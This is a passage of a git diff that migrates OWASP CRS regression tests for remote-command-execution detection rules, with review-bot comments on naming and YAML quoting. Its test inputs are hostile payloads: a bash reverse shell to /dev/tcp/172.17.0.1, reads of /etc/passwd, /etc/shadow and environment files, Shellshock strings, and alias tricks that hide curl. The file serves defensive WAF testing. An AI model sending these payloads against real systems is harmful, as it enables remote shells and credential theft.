headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "932160-2=/usr/bin/perl -e 'print readline' some-file.txt" + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: 
"931120-3=/usr/bin/python3 -m http.server" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=/usr/bin/python3 -m http.server" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: '932160-2=dont match commands that are not fully qualified like bash python and perl.' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932160\"" - - test_title: 932160-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: '932160-2=dont match commands that are not fully qualified like bash python and perl.' 
+ version: "HTTP/1.1" + output: + log: + no_expect_ids: [932160] + - test_id: 5 desc: "Positive test: Match against bin/gunzip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'cmd=/bin/gunzip -c /var/log/something_sensitive.gz' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-6 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'cmd=/bin/gunzip -c /var/log/something_sensitive.gz' + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 6 desc: "Positive test: Match against bin/unxz" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-7 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz' + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 7 desc: "Negative test: Don't match against the word zip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - 
Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: 'sentence=The zip on my coat is stuck' - version: "HTTP/1.1" - output: - no_log_contains: "id \"932160\"" - - test_title: 932160-8 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: 'sentence=The zip on my coat is stuck' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932160] + - test_id: 8 desc: "Positive test: Triggering only this rule and no other one" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - uri: "/post" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=/bin/ab' - version: "HTTP/1.1" - output: - log_contains: "id \"932160\"" - - test_title: 932160-9 + - input: + dest_addr: "127.0.0.1" + method: "POST" + uri: "/post" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=/bin/ab' + version: "HTTP/1.1" + output: + log: + expect_ids: [932160] + - test_id: 9 desc: "Positive test: Unix Command Injection - $SHELL test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=$SHELL -c "echo hi" - uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-10 + - input: + dest_addr: 127.0.0.1 + headers: + 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=$SHELL -c "echo hi" + uri: "/get?code=%24SHELL%20-c%20%22echo%20hi%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] + - test_id: 10 desc: "Positive test: Unix Command Injection - ${SHELL} test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=${SHELL} -c "echo hi" - uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=${SHELL} -c "echo hi" + uri: "/get?code=%24%7BSHELL%7D%20-c%20%22echo%20hi%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] + - test_id: 11 desc: "Positive test: Match against bin/ansible" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/ansible" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/ansible" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] + - test_id: 
12 desc: "Positive test: Match against bin/chef" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/chef" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/chef" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] + - test_id: 13 desc: "Positive test: Match against bin/cscli" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/cscli" - version: HTTP/1.0 - output: - log_contains: id "932160" - - test_title: 932160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/cscli" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] + - test_id: 14 desc: "Positive test: Match against bin/visudo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?a=bin/visudo" - version: HTTP/1.0 - output: - log_contains: id "932160" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?a=bin/visudo" + version: HTTP/1.0 + output: + log: + expect_ids: [932160] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml index 816c0c269..112069387 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml 
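Review bot: Test 3's cookie parameter name, `Cookie: "931120-3=/usr/bin/python3 -m http.server"`, does not follow this file's `932160-<n>` convention and reads like a leftover from another rule's test file; test 4 likewise reuses `932160-2` in its POST body. Now that the rule id lives in `rule_id: 932160` and `test_id` is per file, I would rename these to `932160-3=...` and `932160-4=...` so the parameter that shows up in the WAF log can be matched back to the test that sent it. Tests 1–4 also carry no `desc` while tests 5–14 do, and the old per-file `description` key this hunk drops was the only summary they had; one line each, e.g. `desc: "Positive test: fully qualified /usr/bin/perl in POST body"` for test 2 and `desc: "Negative test: unqualified bash/python/perl words must not match"` for test 4, would keep that intent in the new format.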
@@ -1,192 +1,191 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: "932161.yaml" +rule_id: 932161 tests: - - test_title: 932161-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: cat /etc/passwd - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: cat /etc/passwd + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: /etc/shadow - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: /etc/shadow + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: cat /proc/self/environ - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-4 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: cat /proc/self/environ + Host: 
"localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
- uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 7 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: cat /etc/passwd - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: cat /etc/passwd + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 8 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: /etc/shadow - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: /etc/shadow + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: 
"GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: cat /proc/self/environ - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: cat /proc/self/environ + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 10 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-11 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: dd if=/etc/passwd of=/tmp/evil.sh bs=1 skip=22 count=9 + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 11 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" - - test_title: 932161-12 + - input: + dest_addr: "127.0.0.1" + method: 
"GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: /bin/bash -c "sh -i>& /dev/tcp/172.17.0.1/54321 0>&1" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] + - test_id: 12 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: "id \"932161\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: &/dev/tcp/172.17.0.1/54321 0>&1\'`; ?> + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [932161] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml index 7abbc9c97..837b9b15c 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932170.yaml 
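Review bot: In tests 6 and 12 the `User-Agent` / `Referer` value `&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>` is an unquoted plain scalar that starts with `&`, which YAML reads as an anchor named `/dev/tcp/172.17.0.1/54321`, so the header actually put on the wire is likely only `0>&1\'`; ?>` — worth confirming by dumping the parsed test, since the `/dev/tcp` fragment is presumably the part the rule is meant to catch, and the commit carries this over from the old side unchanged. Quoting it as `User-Agent: '&/dev/tcp/172.17.0.1/54321 0>&1\''`; ?>'` (single quotes keep the backslash literal and `''` yields the apostrophe) sends the full payload. The twelve tests also carry no `desc:` unlike the neighbouring rule files; a one-liner such as `desc: "Positive test: cat /etc/passwd in User-Agent"` per test would make failures readable in the go-ftw output.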
@@ -2,24 +2,23 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Shellshock (CVE-2014-6271)" - enabled: true - name: 932170.yaml +rule_id: 932170 tests: - - test_title: 932170-1 + - test_id: 1 desc: "Test for '() {' in request header test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Test: () { - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932170" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Test: () { + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [932170] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml index 71572eddb..4f1721ed8 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml 
@@ -2,40 +2,39 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Shellshock (CVE-2014-6271)" - enabled: true - name: 932171.yaml +rule_id: 932171 tests: - - test_title: 932171-1 + - test_id: 1 desc: "Test for '() {' in ARGS_NAMES" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?%28%29%20%7B" - version: HTTP/1.0 - output: - log_contains: id "932171" - - test_title: 932171-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?%28%29%20%7B" + version: HTTP/1.0 + output: + log: + expect_ids: [932171] + - test_id: 2 desc: "Test for '() {' in ARGS" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%28%29%20%7B" - version: HTTP/1.0 - output: - log_contains: id "932171" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%28%29%20%7B" + version: HTTP/1.0 + output: + log: + expect_ids: [932171] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml index 790b5740a..44ab3f124 100644 
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml 
@@ -2,272 +2,271 @@ meta: author: "Felipe Zipitria, azurit" description: "Remote Command Execution: shell aliasing detection" - enabled: true - name: 932175.yaml +rule_id: 932175 tests: - - test_title: 932175-1 + - test_id: 1 desc: "Test for 0FA9HCGT alias eennvv=env&eennvv whoami" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=alias%20eennvv%3Denv%26eennvv%20whoami" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=alias%20eennvv%3Denv%26eennvv%20whoami" + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 2 desc: "Test for alias with shell tricks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias a=c${KK}url&a google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias a=c${KK}url&a google.com + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 3 desc: "Test for alias name with single quoting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias 'letter'=curl&letter google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias 'letter'=curl&letter google.com + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 4 desc: "Test for alias name with double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias "quote"=curl"e google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias "quote"=curl"e google.com + version: HTTP/1.1 + output: + log: + expect_ids: [932175] + - test_id: 5 desc: "Test for alias value with single quoting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias alias='curl'&letter google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-6 + - input: + 
